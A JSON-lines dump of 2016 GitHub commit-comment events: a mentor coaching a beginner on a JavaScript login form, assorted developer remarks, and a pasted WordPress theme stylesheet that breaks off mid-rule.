{"id":"4545845096","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977023,"position":37,"line":47,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:45:52Z","updated_at":"2016-09-11T13:45:52Z","body":"But parts of the functions do work, but others dont. Also, since theyre\nattached to buttons im not sure where i would call it.\n\nOn Sun, Sep 11, 2016 at 9:41 AM, Ricky C. <notifications@github.com> wrote:\n\n> @erinl1 <https://github.com/erinl1> Actually, you should of did. Looks\n> like you noticed the function wasn't working. Declaring a function doesn't\n> do anything until you call it. Here's an example.\n>\n> function sayHello() {\n>   console.log(\"Hello\");\n> }\n>\n> That doesn't do anything until I type this sayHello();.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/b02a62460b7ee852ec6a829e2e9971d28ecdd136#commitcomment-18977010>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQldnVBzHzZ4tgziqR89tcQZlpDUUANsks5qpAUigaJpZM4J6AmM>\n> .\n>\n\n\n\n-- \n\nErin Lee\n"}},"created_at":"2016-09-11T13:45:52Z"}
{"id":"4545845163","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977024,"position":27,"line":47,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:45:55Z","updated_at":"2016-09-11T13:45:55Z","body":"Here I am creating a new variable called `database` and assigning it an array with the two objects 👍 ."}},"created_at":"2016-09-11T13:45:55Z"}
{"id":"4545845997","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977025,"position":29,"line":49,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:46:34Z","updated_at":"2016-09-11T13:46:34Z","body":"Here I am writing the name `suPassword` on ❓ ❔ ❓ . Where is my envelope? 🤔"}},"created_at":"2016-09-11T13:46:34Z"}
{"id":"4545846142","type":"CommitCommentEvent","actor":{"login":"GuneetAtwal"},"repo":{"name":"GuneetAtwal/kenzo"},"payload":{"comment":{"id":18977026,"position":null,"line":null,"path":null,"commit_id":"003125dbbba200cc661a28de87c3bf0ba87b0812","created_at":"2016-09-11T13:46:40Z","updated_at":"2016-09-11T13:46:40Z","body":"its beta ;) , le me experiment a little"}},"created_at":"2016-09-11T13:46:40Z"}
{"id":"4545846287","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977027,"position":31,"line":51,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:46:47Z","updated_at":"2016-09-11T13:46:47Z","body":"When I click on the button, I do the following...."}},"created_at":"2016-09-11T13:46:47Z"}
{"id":"4545847134","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977029,"position":null,"line":null,"path":null,"commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:47:20Z","updated_at":"2016-09-11T13:47:20Z","body":"@erinl1 I left you a bunch of comments. I basically just transcribed your code into english. Let's see if you can use that and figure out how to fix it."}},"created_at":"2016-09-11T13:47:20Z"}
{"id":"4545847158","type":"CommitCommentEvent","actor":{"login":"HalfWayMan"},"repo":{"name":"MadCatSue/susan-test-site"},"payload":{"comment":{"id":18977030,"position":null,"line":null,"path":null,"commit_id":"92761284373dfda9f3f43c037f45a0ca5ecdda6c","created_at":"2016-09-11T13:47:21Z","updated_at":"2016-09-11T13:47:21Z","body":"Could we not fall back to port 3000 instead?"}},"created_at":"2016-09-11T13:47:21Z"}
{"id":"4545847265","type":"CommitCommentEvent","actor":{"login":"ttuegel"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18977031,"position":null,"line":null,"path":null,"commit_id":"c6460fb0cbda179b83558a6e19c13a2d5f81a5ed","created_at":"2016-09-11T13:47:26Z","updated_at":"2016-09-11T13:47:26Z","body":"> I hadn't noted that about melpa2nix.\r\n\r\nIt's not well-documented yet. Eventually, I intend to add an `emacs-generated.nix` alongside `emacs-packages.nix` for generated packages that are actually _maintained_, i.e. there is someone testing each update. That maintainer could update their packages one-by-one. It hasn't been a high priority yet because MELPA is pretty well-curated.\r\n\r\nAs far as aliasing packages: I still don't understand why. If you remove the custom definition from `emacs-packages.nix`, the generated definition from `melpaStablePackages` will take over. If we're talking about aliasing packages in `emacsPackages` into `emacsPackagesNg`, that I would understand.\r\n"}},"created_at":"2016-09-11T13:47:26Z"}
{"id":"4545847457","type":"CommitCommentEvent","actor":{"login":"MadCatSue"},"repo":{"name":"MadCatSue/susan-test-site"},"payload":{"comment":{"id":18977032,"position":null,"line":null,"path":null,"commit_id":"92761284373dfda9f3f43c037f45a0ca5ecdda6c","created_at":"2016-09-11T13:47:35Z","updated_at":"2016-09-11T13:47:35Z","body":"No, I prefer to leave this as 8080."}},"created_at":"2016-09-11T13:47:35Z"}
{"id":"4545850641","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977034,"position":37,"line":47,"path":"login.html","commit_id":"b02a62460b7ee852ec6a829e2e9971d28ecdd136","created_at":"2016-09-11T13:49:52Z","updated_at":"2016-09-11T13:49:52Z","body":"Yep! Read the rest of the comments I just put in. I'm going to provide you with the pseudo code or steps to solve this in english. This is what you should be doing even if you don't know how to code. See which parts you've solved and which part you need to work on.\r\n\r\n```\r\n1. Create a Login Form\r\n2. Create a Sign Up Form\r\n3. When a user clicks the button on the sign up form\r\n    1. You need to retrieve the username / password from the input\r\n    2. You need to save the data into an object\r\n    3. You need to push that object into an array\r\n4. When a user clicks the login button\r\n    1. You need to retrieve the username / password from the input\r\n    2. You need to check this username / password against the array of objects from Step 3.3\r\n        1. If the login was successful, display a success messages\r\n        2. If the login failed, display an error message\r\n```"}},"created_at":"2016-09-11T13:49:52Z"}
{"id":"4545852073","type":"CommitCommentEvent","actor":{"login":"rrrene"},"repo":{"name":"tj/terminal-table"},"payload":{"comment":{"id":18977035,"position":9,"line":55,"path":"lib/terminal-table/cell.rb","commit_id":"eaf8b777bafd1a06f17a8901a36be226debc5055","created_at":"2016-09-11T13:50:51Z","updated_at":"2016-09-11T13:50:51Z","body":"I honestly can't remember (it has been 5 years). The duplication might very well be an error."}},"created_at":"2016-09-11T13:50:51Z"}
{"id":"4545852396","type":"CommitCommentEvent","actor":{"login":"Tauriella"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18977036,"position":null,"line":null,"path":null,"commit_id":"5c92f5ba5e3422ccd2f75233f762962c7270c90a","created_at":"2016-09-11T13:51:07Z","updated_at":"2016-09-11T13:51:07Z","body":"ARRRG you mean only 1.0 is supported\r\nAnd i upgrade :8ball: "}},"created_at":"2016-09-11T13:51:07Z"}
{"id":"4545854032","type":"CommitCommentEvent","actor":{"login":"Rinnegatamante"},"repo":{"name":"vitasdk/vita-headers"},"payload":{"comment":{"id":18977038,"position":null,"line":null,"path":null,"commit_id":"84d859029be29445383a5d5a1c8e30810565b465","created_at":"2016-09-11T13:52:13Z","updated_at":"2016-09-11T13:52:13Z","body":"All these functions are unavailable in the stub library even if manually rebuilded."}},"created_at":"2016-09-11T13:52:13Z"}
{"id":"4545855412","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18977041,"position":null,"line":null,"path":null,"commit_id":"d5ca93e931f4a867ff90228f930b7eb0083ffd6f","created_at":"2016-09-11T13:53:08Z","updated_at":"2016-09-11T13:53:08Z","body":"1. Create bee app which can create a lot of bee worker by **simple_one_of_one**;\r\n2. Zoo app depend on bee app;\r\n3. Zoo create bee worker every 3000ms\r\n4. Kill all bee workers.\r\n![image](https://cloud.githubusercontent.com/assets/3116225/18417700/dcf8ccc0-7869-11e6-9943-4a5773bb8505.png)\r\n```erlang\r\n1> length(bee_sup:all_children()).\r\n17\r\n2> zoo_keeper:kill_bee().\r\n17\r\n```"}},"created_at":"2016-09-11T13:53:08Z"}
{"id":"4545855745","type":"CommitCommentEvent","actor":{"login":"hugocorbucci"},"repo":{"name":"agile-alliance-brazil/election"},"payload":{"comment":{"id":18977042,"position":null,"line":null,"path":null,"commit_id":"8367fbad769575a481e3b6354b695de4de911079","created_at":"2016-09-11T13:53:18Z","updated_at":"2016-09-11T13:53:18Z","body":"This is helping a bunch with #9 "}},"created_at":"2016-09-11T13:53:18Z"}
{"id":"4545855988","type":"CommitCommentEvent","actor":{"login":"hugocorbucci"},"repo":{"name":"agile-alliance-brazil/election"},"payload":{"comment":{"id":18977043,"position":null,"line":null,"path":null,"commit_id":"24a08b41da053ad1dc6d446d241c87dc326a91f4","created_at":"2016-09-11T13:53:27Z","updated_at":"2016-09-11T13:53:27Z","body":"This is helping with #9 "}},"created_at":"2016-09-11T13:53:27Z"}
{"id":"4545856161","type":"CommitCommentEvent","actor":{"login":"hugocorbucci"},"repo":{"name":"agile-alliance-brazil/election"},"payload":{"comment":{"id":18977044,"position":null,"line":null,"path":null,"commit_id":"d12500598aabae77c967f43ddecc248ee98ca809","created_at":"2016-09-11T13:53:33Z","updated_at":"2016-09-11T13:53:33Z","body":"This is helping a bunch with #9 "}},"created_at":"2016-09-11T13:53:33Z"}
{"id":"4545856264","type":"CommitCommentEvent","actor":{"login":"hugocorbucci"},"repo":{"name":"agile-alliance-brazil/election"},"payload":{"comment":{"id":18977046,"position":null,"line":null,"path":null,"commit_id":"1cbd59631c81634427352f579e53f00e4ec3b7ac","created_at":"2016-09-11T13:53:38Z","updated_at":"2016-09-11T13:53:38Z","body":"This is helping a bunch with #9 "}},"created_at":"2016-09-11T13:53:38Z"}
{"id":"4545856961","type":"CommitCommentEvent","actor":{"login":"websequel"},"repo":{"name":"websequel/pranamaya"},"payload":{"comment":{"id":18977048,"position":null,"line":null,"path":null,"commit_id":"eb85c06402bca9cf5a5662e4ddafac215c1251a4","created_at":"2016-09-11T13:54:06Z","updated_at":"2016-09-11T13:54:06Z","body":"@charset 'utf-8';\r\n/*\r\nTheme Name: Pranamaya Yoga\r\nTheme URI: http://websequel.com\r\nDescription: Pranamaya Yoga\r\nAuthor: Web Sequel LLC\r\nAuthor URI: http://websequel.com/\r\nVersion: 1.0\r\nLicense: GNU General Public License\r\nLicense URI: license.txt\r\nTags: light, responsive-layout, flexible-header, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, featured-image-header, featured-images, full-width-template, microformats, post-formats, theme-options, threaded-comments, translation-ready\r\nText Domain: Pranamaya Yoga\r\n*/\r\n\r\n\r\n/* TABLE OF CONTENTS:\r\n\r\n1. Reset tags\r\n2. Default tag's settings\r\n3. Form fields settings\r\n4. WP styles and Screen readers\r\n5. Theme grid\r\n6. Page layouts\r\n7. Section's decorations\r\n   7.1 Header\r\n   7.2 Main Slider\r\n   7.3 Page top: page title and breadcrumbs\r\n   7.4 Main content wrapper\r\n   7.5 Post Formats\r\n   7.6 Post Layouts\r\n   7.7 Paginations\r\n8. Single page parts\r\n   8.1 Attachment and Portfolio post navigation\r\n   8.2 Reviews block\r\n   8.3 Post author\r\n   8.4 Comments\r\n   8.5 Page 404\r\n   8.8 Team member\r\n9. Sidebars\r\n10. Footer areas\r\n11. Utils\r\n12. Registration and Login popups\r\n13. Third part plugins\r\n14. Predefined classes for users\r\n\r\n-------------------------------------------------------------- */\r\n\r\n\r\n\r\n\r\n/* 1. Reset tags\r\n-------------------------------------------------------------- */\r\nhtml, body, div, span, applet, object, iframe,\r\nh1, h2, h3, h4, h5, h6, p, blockquote, pre,\r\na, abbr, acronym, address, big, cite, code,\r\ndel, dfn, em, font, ins, kbd, q, s, samp,\r\nsmall, strike, strong, sub, sup, tt, var,\r\ndl, dt, dd, ol, ul, li,\r\nfieldset, form, label, legend,input,textarea,button,\r\ntable, caption, tbody, tfoot, thead, tr, th, td,\r\narticle, aside, address, section, video, audio {\r\n\tfont-family: inherit;\r\n\tfont-size: 100%;\r\n\tfont-style: inherit;\r\n\tfont-weight: inherit;\r\n\tline-height:inherit;\r\n\tborder: 0;\r\n\toutline: 0;\r\n\t-webkit-font-smoothing: antialiased;\r\n\t-ms-word-wrap: break-word;\r\n\tword-wrap: break-word;\r\n}\r\nhtml, body {\r\n\tmargin: 0;\r\n\tpadding: 0;\r\n\twidth: 100%;\r\n\tline-height:150%;\r\n}\r\nhtml {\r\n\theight: 100%;\r\n\tfont-size: 100%;\t/*62.5%;*/\t\t/* Corrects text resizing oddly in IE6/7 when body font-size is set using em units http://clagnut.com/blog/348/#c790 */\r\n\toverflow-y: scroll;\t\t \t\t\t/* Keeps page centred in all browsers regardless of content height */\r\n\t-webkit-text-size-adjust: 100%; \t/* Prevents iOS text size adjust after orientation change, without disabling user zoom */\r\n\t-ms-text-size-adjust: 100%; \t/* www.456bereastreet.com/archive/201012/controlling_text_size_in_safari_for_ios_without_disabling_user_zoom/ */\r\n\t-webkit-tap-highlight-color: rgba(0, 0, 0, 0);\r\n}\r\nbody {\r\n\t/* height: 100%; */\t\t\t\t\t/* Commented, because it conflict with overflow-x: hidden - appear second scrollbar while tooltip is display in the Booked plugin */\r\n}\r\n\r\n .sc_form .sc_form_item select::-ms-expand {\r\n    display: none;\r\n}\r\n\r\n#update-nag, .update-nag{\r\n\tdisplay: block !important;\r\n}\r\n\r\n\r\n/* 2. Default tag's settings\r\n-------------------------------------------------------------- */\r\nbody { \ttext-rendering: optimizeLegibility; }\r\n\r\narticle, aside, details, figcaption, figure, footer, header, hgroup, nav, section {\tdisplay: block; }\r\n\r\nh1, h2, h3, h4, h5, h6 { line-height:120%; }\r\nh1, h2, h3, h4, h5, h6, p, ul, ol, dl, blockquote, address { margin: 0; }\r\nh1+h2,h1+h3,h1+h4,h1+h5,h1+h6,\r\nh2+h3,h2+h4,h2+h5,h2+h6,\r\nh3+h4,h3+h5,h3+h6,\r\nh4+h5,h4+h6,\r\nh5+h6 {\r\n\tmargin-top:0;\r\n}\r\ndt, b, strong {\tfont-weight: 500; }\r\np, ul, ol, dl, blockquote, address { margin-bottom: 1.5em; }\r\nli > ol, li > ul { margin-bottom:0; }\r\nul>li, ol>li, dl>dd { margin-bottom:0.5em; font-weight: 500; }\r\nli>ul, li>ol, dd>dl { margin-top:0.5em; }\r\nli > p { margin-bottom:0; }\r\nli > p+p { margin-top:0.5em; }\r\n\r\nol, ul {\r\n\tpadding-left:1.5em;\r\n}\r\n\r\n\r\n/* Links */\r\na {\r\n\ttext-decoration:none;\r\n\tbackground:transparent;\r\n}\r\na,\r\na:hover,\r\na:focus,\r\na:active {\r\n\toutline: 0;\r\n}\r\na img { border: none; }\r\n\r\na,\r\nbutton {\r\n\t-webkit-transition: all 0.3s ease 0s;\r\n\t-moz-transition: all 0.3s ease 0s;\r\n\t-ms-transition: all 0.3s ease 0s;\r\n\t-o-transition: all 0.3s ease 0s;\r\n\ttransition: all 0.3s ease 0s;\r\n}\r\n\r\n:active, :focus { outline:0; }\r\n\r\n\r\n/* Tables */\r\ntable {\r\n\tborder-collapse:collapse;\r\n\tborder-spacing: 0;\r\n}\r\ntd, th {\r\n\tborder: 1px solid #e4e7e8;\r\n\tpadding: 4px;\r\n}\r\ncaption, th {\r\n\tfont-weight: bold;\r\n\ttext-align: center;\r\n}\r\nbody[class*=\"woocommerce-\"] table th, body[class*=\"woocommerce-\"] table td {\r\n\tborder-width:0;\r\n}\r\n\r\nblockquote:before, blockquote:after,\r\nq:before, q:after {\tcontent: \"\"; }\r\nblockquote, q {\tquotes: \"\" \"\";}\r\n\r\ndt {\tfont-weight: bold; }\r\ndd {\tmargin-left: 1.5em; }\r\nb, strong {\tfont-weight: bold; }\r\ndfn, cite, em, i { font-style: italic; }\r\n\r\npre, code, kbd, tt, var, samp {\r\n\tfont-family: \"Courier New\", Courier, monospace;\r\n\tfont-size: 1em;\r\n}\r\npre {\r\n\toverflow: auto;\r\n\tmax-width: 100%;\r\n}\r\nabbr, acronym {\r\n\tborder-bottom: 1px dotted;\r\n\tcursor: help;\r\n}\r\nmark, ins {\r\n\tbackground-color:transparent;\r\n\ttext-decoration: none;\r\n\tfont-style:italic;\r\n\tfont-weight:bold;\r\n}\r\nsup,\r\nsub {\r\n\tfont-size: 75%;\r\n\theight: 0;\r\n\tline-height: 0;\r\n\tposition: relative;\r\n\tvertical-align: baseline;\r\n}\r\nsup { bottom: 1ex; }\r\nsub { top: .5ex; }\r\nsmall {\tfont-size: 75%; }\r\nbig {\tfont-size: 125%; }\r\n\r\n[hidden], template { display: none; }\r\n\r\nhr {\r\n\t-moz-box-sizing: content-box;\r\n\tbox-sizing: content-box;\r\n\theight: 0;\r\n}\r\n\r\n/* Images */\r\nimg {\r\n\tmax-width: 100%;\r\n\theight: auto;\r\n\tvertical-align:top;\r\n}\r\n\r\nfigure,\r\n.wp-caption-overlay .wp-caption {\r\n\tborder: 0;\r\n\tmargin: 0;\r\n\tpadding: 0;\r\n\toverflow: hidden;\r\n\tposition: relative;\r\n\tmax-width:100%;\r\n}\r\nfigure figcaption,\r\n.wp-caption-overlay .wp-caption .wp-caption-text,\r\n.wp-caption-overlay .wp-caption .wp-caption-dd {\r\n\t-webkit-transition: all ease-in-out .3s;\r\n\t-moz-transition: all ease-in-out .3s;\r\n\t-ms-transition: all ease-in-out .3s;\r\n\t-o-transition: all ease-in-out .3s;\r\n\ttransition: all ease-in-out .3s;\r\n\tposition: absolute;\r\n\tbottom: 0;\r\n\tright: 0;\r\n\tleft: 0;\r\n\tmargin-bottom: 0;\r\n\tbackground-color: rgba(0,0,0,0.5);\r\n\tfont-size: 0.938em;\r\n\tline-height:1.2857em;\r\n\tcolor: #fff;\r\n\tpadding: 1em;\r\n}\r\nfigure:hover figcaption,\r\n.wp-caption-overlay .wp-caption:hover .wp-caption-text,\r\n.wp-caption-overlay .wp-caption:hover .wp-caption-dd {\r\n\tmargin-bottom: -5em !important;\r\n}\r\n\r\nsvg:not(:root) { overflow: hidden; }\r\n\r\n\r\n\r\n/* Audio and Video */\r\naudio,\r\ncanvas,\r\nprogress,\r\nvideo {\r\n\tdisplay: inline-block;\r\n\tvertical-align: baseline;\r\n}\r\naudio:not([controls]) {\r\n\tdisplay: none;\r\n\theight: 0;\r\n}\r\niframe, video, embed {\r\n\tmax-width: 100%;\r\n\tmin-height: 100px;\r\n\tvertical-align: top;\r\n}\r\n\r\n/* Media Elements player hook */\r\n.me-cannotplay { overflow:hidden; }\r\n.me-plugin { position: absolute; height: 0; width: 0; }\t\t\t/* Media elements hook for Safary */\r\n\r\n/* Fontello icons */\r\n[class^=\"icon-\"]:before, [class*=\" icon-\"]:before {\r\n\tline-height: inherit;\r\n\tfont-weight: inherit;\r\n\tfont-size: inherit;\r\n\twidth:auto;\r\n\tmargin:0;\r\n\tfont-weight: 400;\r\n}\r\n\r\n\r\n\r\n\r\n/* 3. Form fields settings\r\n-------------------------------------------------------------- */\r\nbutton, input, optgroup, select, textarea {\r\n\tfont-family: inherit;\r\n\tfont-size: 1em;\t\t\t\t/* Corrects font size not being inherited in all browsers */\r\n\tmargin: 0;\t\r\n\tline-height: normal;\t\t\t\t/* Addresses margins set differently in IE6/7, F3/4, S5, Chrome */\r\n\tvertical-align: baseline;\t/* Improves appearance and consistency in all browsers */\r\n}\r\n\r\nselect{width: 100%;}\r\n\r\nbutton {\r\n\toverflow: visible; \r\n}\r\nbutton,\r\ninput[type=\"button\"],\r\ninput[type=\"reset\"],\r\ninput[type=\"submit\"] {\r\n\t-webkit-appearance: button;\r\n\tcursor: pointer;\r\n}\r\nbutton[disabled],\r\nhtml input[disabled] {\r\n\tcursor: default;\r\n}\r\nbutton::-moz-focus-inner,\r\ninput::-moz-focus-inner {\r\n\tborder: 0;\r\n\tpadding: 0;\r\n}\r\ntextarea,\r\nselect,\r\ninput[type=\"text\"],\r\ninput[type=\"number\"],\r\ninput[type=\"email\"],\r\ninput[type=\"password\"],\r\ninput[type=\"search\"],\r\ninput[type=\"checkbox\"],\r\ninput[type=\"radio\"] {\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\t/* Addresses box sizing set to content-box in IE8/9 */\r\n}\r\ninput[type=\"checkbox\"],\r\ninput[type=\"radio\"] {\r\n\tpadding: 0;\t\t\t\t\t\t/* Addresses excess padding in IE8/9 */\r\n}\r\ninput[type=\"number\"]::-webkit-inner-spin-button,\r\ninput[type=\"number\"]::-webkit-outer-spin-button {\r\n\theight: auto;\r\n}\r\ninput[type=\"search\"] {\r\n\t-webkit-appearance: none;\t\t/* Addresses appearance set to searchfield in S5, Chrome */\r\n\t-webkit-appearance: textfield;\r\n}\r\ninput[type=\"search\"]::-webkit-search-cancel-button,\r\ninput[type=\"search\"]::-webkit-search-decoration {\r\n\t-webkit-appearance: none;\t\t/* Corrects inner padding displayed oddly in S5, Chrome on OSX */\r\n}\r\nbutton::-moz-focus-inner,\r\ninput::-moz-focus-inner {\t\t\t/* Corrects inner padding and border displayed oddly in FF3/4 www.sitepen.com/blog/2008/05/14/the-devils-in-the-details-fixing-dojos-toolbar-buttons/ */\r\n\tborder: 0;\r\n\tpadding: 0;\r\n}\r\ninput[type=\"text\"],\r\ninput[type=\"number\"],\r\ninput[type=\"email\"],\r\ninput[type=\"password\"],\r\ninput[type=\"search\"],\r\nselect,\r\ntextarea {\r\n\t-webkit-appearance: none;\r\n\toutline: none;\r\n\tresize: none;\r\n\tpadding: 0.45em 0.5em;\r\n\tborder: solid 1px;\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n\t-webkit-transition: all ease .3s;\r\n\t-moz-transition: all ease .3s;\r\n\t-ms-transition: all ease .3s;\r\n\t-o-transition: all ease .3s;\r\n\ttransition: all ease .3s;\r\n\t-webkit-border-radius: 5px !important;\r\n\t-moz-border-radius: 5px !important;\r\n\tborder-radius: 5px !important;\r\n}\r\n\r\nbutton::-moz-focus-inner { \r\n\tborder: 0;\r\n}\r\nbutton:focus,\r\ninput[type=\"text\"]:focus,\r\ninput[type=\"email\"]:focus,\r\ninput[type=\"password\"]:focus,\r\ninput[type=\"search\"]:focus,\r\nselect,\r\ntextarea:focus {\r\n\toutline: none;\r\n}\r\ntextarea {\r\n\toverflow: auto;\t\t\t/* Removes default vertical scrollbar in IE6/7/8/9 */\r\n\tvertical-align: top;\t/* Improves readability and alignment in all browsers */\r\n\tmin-height:5em;\r\n}\r\nlabel.required:after {\r\n\tcontent:'*';\r\n\tdisplay:inline-block;\r\n\tvertical-align:text-top;\r\n\tfont-size:80%;\r\n\tcolor:#da6f5b;\r\n}\r\n\r\n\r\n\r\n.top_panel_middle input[type=\"text\"]{\r\n\tpadding: 0.1em 0.5em;\r\n}\r\n\r\n/* 4. WP styles and Screen readers\r\n-------------------------------------------------------------- */\r\n.screen-reader-text {\r\n\tclip: rect(1px, 1px, 1px, 1px);\r\n\tposition: absolute !important;\r\n}\r\n\r\n.screen-reader-text:hover,\r\n.screen-reader-text:active,\r\n.screen-reader-text:focus {\r\n\tdisplay: block;\r\n\ttop: 5px;\r\n\tleft: 5px;\r\n\twidth: auto;\r\n\theight: auto;\r\n\tpadding: 1em 1.5em;\r\n\tfont-size:0.85em;\r\n\tline-height: normal;\r\n\tcolor: #21759b;\r\n\tbackground-color: #f1f1f1;\r\n\tborder-radius: 3px;\r\n\tbox-shadow: 0 0 2px 2px rgba(0, 0, 0, 0.6);\r\n\tclip: auto !important;\r\n\ttext-decoration: none;\r\n\tz-index: 100000; /* Above WP toolbar */\r\n}\r\n\r\n.alignleft {\r\n\tdisplay: inline-block;\r\n\tfloat: left;\r\n\tmargin-right: 2em;\r\n\tmargin-top: 1em;\r\n\tmargin-bottom: 1em;\r\n}\r\n.alignright {\r\n\tdisplay: inline-block;\r\n\tfloat: right;\r\n\tmargin-left: 2em;\r\n\tmargin-top: 1em;\r\n\tmargin-bottom: 1em;\r\n}\r\n.aligncenter {\r\n\tclear: both;\r\n\tdisplay: block !important;\r\n\tmargin-left: auto !important;\r\n\tmargin-right:auto !important;\r\n\tmargin-top: 1em;\r\n\tmargin-bottom: 1em;\r\n\ttext-align:center;\r\n}\r\n\r\n.sticky {\r\n\tposition:relative;\r\n}\r\n.sticky .sticky_label {\r\n\tposition:absolute; \r\n\tright:0;\r\n\ttop: 0;\r\n\twidth:3em;\r\n\theight:3em;\r\n\tbackground-image:url(images/sticky.png);\r\n\tbackground-repeat:no-repeat;\r\n\tbackground-position:right top;\r\n\tbackground-size:3em 3em;\r\n}\r\n.gallery-caption {}\r\n.bypostauthor {}\r\n\r\n.wp-caption {\r\n\tposition: relative;\r\n\toverflow:hidden;\r\n\tmax-width:100%;\r\n}\r\n.wp-caption a[class*=\"magnific\"],\r\n.wp-caption a[class*=\"prettyPhoto\"] {\r\n\tdisplay: block;\r\n}\r\n.wp-caption a[class*=\"magnific\"] img,\r\n.wp-caption a[class*=\"prettyPhoto\"] img {\r\n\tvertical-align: top;\r\n}\r\n.wp-caption .wp-caption-text,\r\n.wp-caption .wp-caption-dd {\r\n\tpadding: 0.5em 0 2em;\r\n\tfont-size:0.75em;\r\n\tline-height:16px;\r\n\tfont-style:italic;\r\n\ttext-align:center;\r\n}\r\n\r\n.gallery {\r\n\tmargin: 0 -5px;\r\n}\r\n.gallery .gallery-item a {\r\n\tdisplay: block;\r\n}\r\n.gallery .gallery-item a img {\r\n\tborder: none !important;\r\n\tdisplay: block;\r\n\twidth: 100%;\r\n}\r\n.gallery .gallery-item .gallery-icon {\r\n\tmargin: 0 5px;\r\n}\r\n.gallery .gallery-item .gallery-caption {\r\n\tline-height: 100%;\r\n\tmargin: 0;\r\n\tpadding: 6px 6px 0;\r\n\tfont-size:0.875em;\r\n}\r\n.gallery.gallery-columns-9 .gallery-item {\twidth: 11.1111% !important; }\r\n.gallery.gallery-columns-8 .gallery-item {\twidth: 12.5% !important; }\r\n.gallery.gallery-columns-7 .gallery-item {\twidth: 14.2857% !important; }\r\n.gallery.gallery-columns-6 .gallery-item {\twidth: 16.6666% !important; }\r\n.gallery.gallery-columns-5 .gallery-item {\twidth: 20% !important; }\r\n.gallery.gallery-columns-4 .gallery-item {\twidth: 25% !important; }\r\n.gallery.gallery-columns-3 .gallery-item {\twidth: 33.3333% !important; }\r\n.gallery.gallery-columns-2 .gallery-item {\twidth: 50% !important; }\r\n.gallery.gallery-columns-1 .gallery-item {\twidth: 100% !important; }\r\n.gallery.gallery-columns-9 .gallery-caption { font-size: 0.625em; }\r\n.gallery.gallery-columns-8 .gallery-caption { font-size: 0.6875em; }\r\n.gallery.gallery-columns-7 .gallery-caption { font-size: 0.75em; }\r\n.gallery.gallery-columns-6 .gallery-caption { font-size: 0.8125em; }\r\n\r\n.post-password-form label {\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n}\r\n.post-password-form input[type=\"submit\"] {\r\n\tdisplay:inline-block;\r\n\tmargin-left:10px;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n/* 5. Theme grid\r\n-------------------------------------------------------------- */\r\n.container, .container-fluid {\r\n\tmargin-right: auto;\r\n\tmargin-left: auto;\r\n\tpadding-left: 15px;\r\n\tpadding-right: 15px;\r\n}\r\n.row, .columns_wrap {\r\n\tmargin-left: 0px;\t\t/* -15px; */\r\n\tmargin-right: -30px;\t/* -15px; */\r\n}\r\n.row > [class*=\"column-\"], .columns_wrap > [class*=\"column-\"] {\r\n\r\n\r\n\tdisplay:inline-block;\r\n\tvertical-align:top;\r\n\r\n\tposition: relative;\r\n\tmin-height: 1px;\r\n\tpadding-left: 0px;\t/* 15px; */\r\n\tpadding-right: 30px;\t/* 15px; */\r\n\t-webkit-box-sizing: border-box;\r\n\t-moz-box-sizing: border-box;\r\n\tbox-sizing: border-box;\r\n}\r\n.row.column_padding_left, .columns_wrap.column_padding_left {\r\n\tmargin-left: -30px;\r\n\tmargin-right: 0;\r\n}\r\n.row.column_padding_left > [class*=\"column-\"], .columns_wrap.column_padding_left > [class*=\"column-\"],\r\n.row > [class*=\"column-\"].column_padding_left, .columns_wrap > [class*=\"column-\"].column_padding_left {\r\n\tpadding-left:30px;\r\n\tpadding-right:0;\r\n}\r\n.row.column_padding_right, .columns_wrap.column_padding_right {\r\n\tmargin-left: 0;\r\n\tmargin-right: -30px;\r\n}\r\n.row.column_padding_right > [class*=\"column-\"], .columns_wrap.column_padding_right > [class*=\"column-\"],\r\n.row > [class*=\"column-\"].column_padding_right, .columns_wrap > [class*=\"column-\"].column_padding_right {\r\n\tpadding-left:0;\r\n\tpadding-right:30px;\r\n}\r\n.row.column_padding_center, .columns_wrap.column_padding_center {\r\n\tmargin-left: -15px;\r\n\tmargin-right: -15px;\r\n}\r\n.row.column_padding_center > [class*=\"column-\"], .columns_wrap.column_padding_center > [class*=\"column-\"],\r\n.row > [class*=\"column-\"].column_padding_center, .columns_wrap > [class*=\"column-\"].column_padding_center {\r\n\tpadding-left:15px;\r\n\tpadding-right:15px;\r\n}\r\n.row > [class*=\"column-\"].column_padding_bottom, .columns_wrap > [class*=\"column-\"].column_padding_bottom {\r\n\tpadding-bottom: 30px;\r\n}\r\n.sc_blogger.no_margins .row, .sc_blogger.no_margins .columns_wrap,\r\n.row.no_margins, .columns_wrap.no_margins {\r\n\tmargin: 0 